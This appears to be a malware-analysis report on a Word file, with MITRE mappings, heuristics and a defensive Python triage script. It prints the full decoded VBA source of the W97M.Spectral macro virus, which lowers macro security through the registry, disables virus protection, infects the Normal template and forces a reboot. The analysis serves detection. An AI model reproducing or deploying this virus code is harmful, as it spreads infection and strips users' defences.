Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open procedure that runs as soon as the document is opened. The code is the W97M.Spectral macro virus (the comment at the top of the routine reads "W97M.Spectral by Draconia"). On each open it exports the module named "Spectral" to C:\Av.log and imports that file into the Normal template's ThisDocument module, or, if Normal is already infected, into the active document, which it then saves. This is the classic Normal.dot infection loop: once Normal carries the macro, every document subsequently created or opened picks it up. The installed-check is broken (it sets DropScreamInstalled but tests SpectralInstalled, and likewise for the document branch), so the export/import path runs on every open and relies on the On Error handler to swallow failures, which makes repeated writes to C:\Av.log a usable host indicator. Before replicating, the macro disables Word's defences: it sets HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level to 1 (the lowest macro security setting in Word 2000) and greys out the Macro > Security... menu entry, or, if that key is absent (Word 97), sets Options.VirusProtection = False, re-enables auto macros and disables the cancel key. It records the infection in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SpectralInstalled = "Yes" and, on first infection, runs a Payload routine that shows an Office Assistant balloon and calls ExitWindowsEx(EWX_REBOOT, 0) to force a reboot. ShellExecute is declared through a Declare statement but is never called anywhere in the extracted code, and there is no download or second-stage logic. The ClamAV detections of Win.Trojan.Psycho-3 (container) and Doc.Trojan.Spectral-1 (extracted macro) are consistent with a self-replicating macro virus rather than a downloader.
Heuristics (4)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:

```vba
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
```
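The summary and the SC_STR_SHELLEXEC heuristic above hinge on a distinction a triage script should make explicitly: which Win32 APIs the macro merely declares versus which it actually calls, and whether the VBProject export/import sequence targets the Normal template. The Python below is an added example written for this page, not the analyzer's own code and not part of the sample. It runs a handful of regex checks over a constructed, condensed excerpt of the preview script (embedded inline so it runs offline) and reports auto-exec entry points, declared-but-unused imports, registry writes made through System.PrivateProfileString, module drop paths, security downgrades, and whether any download primitives appear. The rule names, the AUTO_EXEC list and the classify labels are this example's own assumptions.

```python
import json
import re

# Constructed sample for this example: a condensed excerpt of the VBA that the
# report's preview shows for this document (W97M.Spectral), embedded inline so
# the script runs offline. In practice, pass it the olevba-decoded macro text.
SAMPLE_VBA = r"""
Private Declare Function ExitWindowsEx Lib "User32" (ByVal fuOptions As Integer, ByVal Reserved As Integer) As Boolean
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
On Error GoTo ErrorDcOe:
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
ActiveDocument.VBProject.VBComponents("Spectral").Export "C:\Av.log"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") = "Yes"
Call Payload
ErrorDcOe:
End Sub
Private Sub Payload()
Const EWX_REBOOT As Integer = 2
ExitWindowsEx EWX_REBOOT, 0
End Sub
"""

# Win32 imports brought in through Declare statements (name, library, optional alias).
DECLARE_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<name>\w+)'
    r'\s+Lib\s+"(?P<lib>[^"]+)"(?:\s+Alias\s+"(?P<alias>[^"]+)")?', re.I | re.M)
PROC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)', re.I | re.M)
# Registry writes done through Word's System.PrivateProfileString("", key, value) = x idiom.
REG_WRITE_RE = re.compile(
    r'System\.PrivateProfileString\(\s*""\s*,\s*"(?P<key>[^"]+)"\s*,\s*"(?P<value>[^"]+)"\s*\)\s*=\s*(?P<rhs>.+)', re.I)
# VBProject export/import of module source: the Normal.dot infection primitive.
DROP_RE = re.compile(r'\.(?:Export|AddFromFile|Import)\s+"(?P<path>[^"]+)"', re.I)
DOWNLOAD_RE = re.compile(r'URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen|https?://', re.I)
AUTO_EXEC = {"autoopen", "autoexec", "autoclose", "autoexit", "autonew",  # assumed list
             "document_open", "document_close", "document_new", "workbook_open"}


def code_lines(src):
    """Yield non-blank lines that are not pure comments."""
    for line in src.splitlines():
        s = line.strip()
        if s and not s.startswith("'"):
            yield line


def declared_apis(src):
    return {m.group("name"): (m.group("lib"), m.group("alias")) for m in DECLARE_RE.finditer(src)}


def called_apis(src, declared):
    """APIs referenced on a line other than their own Declare, with string literals blanked."""
    called = set()
    for line in code_lines(src):
        if DECLARE_RE.match(line):
            continue
        bare = re.sub(r'"[^"]*"', '""', line)
        called.update(n for n in declared if re.search(r'\b%s\b' % re.escape(n), bare, re.I))
    return called


def registry_writes(src):
    return [{"key": m.group("key"), "value": m.group("value"), "data": m.group("rhs").strip()}
            for m in REG_WRITE_RE.finditer(src)]


def security_downgrades(src, writes):
    found = []
    if re.search(r'Options\.VirusProtection\s*=\s*False', src, re.I):
        found.append("Options.VirusProtection = False")
    if re.search(r'\bDisableAutoMacros\b', src, re.I):
        found.append("WordBasic.DisableAutoMacros")
    if any(w["key"].lower().endswith(r"\word\security") and w["value"].lower() == "level" for w in writes):
        found.append("Word macro security level written via registry")
    return found


def triage(src):
    declared = declared_apis(src)
    called = called_apis(src, declared)
    writes = registry_writes(src)
    return {
        "auto_exec": [n for n in PROC_RE.findall(src) if n.lower() in AUTO_EXEC],
        "declared_apis": sorted(declared),
        "called_apis": sorted(called),
        "declared_but_unused": sorted(set(declared) - called),
        "drop_paths": sorted({m.group("path") for m in DROP_RE.finditer(src)}),
        "normal_template_infection": bool(re.search(r'NormalTemplate\.VBProject', src, re.I)
                                          and re.search(r'\.(?:AddFromFile|Import|InsertLines)\b', src, re.I)),
        "registry_writes": writes,
        "security_downgrades": security_downgrades(src, writes),
        "download_indicators": sorted({m.group(0) for m in DOWNLOAD_RE.finditer(src)}),
    }


def classify(report):
    """Assumed labels: download primitives outrank replication, since a dropper may do both."""
    if report["download_indicators"]:
        return "downloader: fetches remote content"
    if report["normal_template_infection"]:
        return "macro virus: infects Normal template, no download indicators"
    return "undetermined"


if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    print(json.dumps(report, indent=2))
    print(classify(report))
```

Against the real sample, feed it the text olevba decoded (macros.bas in the artifact table): it flags Document_Open, reports ShellExecute as declared but unused and ExitWindowsEx as called, records the two registry writes and the C:\Av.log drop path, and classifies the code as a Normal-template-infecting macro virus with no download indicators. The regexes are deliberately naive (no handling of `_` line continuations or names built from string fragments), which is acceptable for this artifact because the report marks obfuscation as unlikely; treat a miss on obfuscated input as a reason to look harder, not as a clean bill.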
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3700 bytes | 6a17eb67f5a478ec2f3ffc3df94d4e10716df5b9f332542bf9ac8c7ed9937286 | ClamAV: Doc.Trojan.Spectral-1 | unlikely |
Preview script (first 1,000 lines of the extracted script). The extract concatenates two modules as decoded by olevba: ThisDocument, which carries only its Attribute header, and Module1, which holds the virus body.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal fuOptions As Integer, ByVal Reserved As Integer) As Boolean
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
' Member of Virus Quest
' Copyright@1999
On Error GoTo ErrorDcOe:
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
iMacroNormalDotCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalDotCount
If NormalTemplate.VBProject.VBComponents(i).Name = "Spectral" Then
DropScreamInstalled = -1
End If
Next i
If Not SpectralInstalled Then
ActiveDocument.VBProject.VBComponents("Spectral").Export "C:\Av.log"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
NormalTemplate.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") <> "Yes" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") = "Yes"
Call Payload
End If
Else
iMacroActiveDctCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroActiveDctCount
If ActiveDocument.VBProject.VBComponents(i).Name = "Spectral" Then
DropScreamDocInstalled = -1
End If
Next i
If Not SpecDocInstalled Then
NormalTemplate.VBProject.VBComponents("Spectral").Export "C:\Av.log"
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
ActiveDocument.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
ActiveDocument.Save
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Tips:"
.Text = "Get yourself a good quality Anti-Virus software!" & Chr(13) & "Thanks to F-Prot, AVP, NAV, McAffee, Dr Solomon!!!"
.Show
End With
End If
End If
ErrorDcOe:
End Sub
Private Sub Payload()
On Error GoTo ErrorPDSc
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Const EWX_REBOOT As Integer = 2
Assistant.Visible = True
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Microsoft Word"
.Text = "Important:" & Chr(13) & "Becareful, you must reboot your PC, now! I'm outta here!"
.Show
End With
ExitWindowsEx EWX_REBOOT, 0
ErrorPDSc:
End Sub
```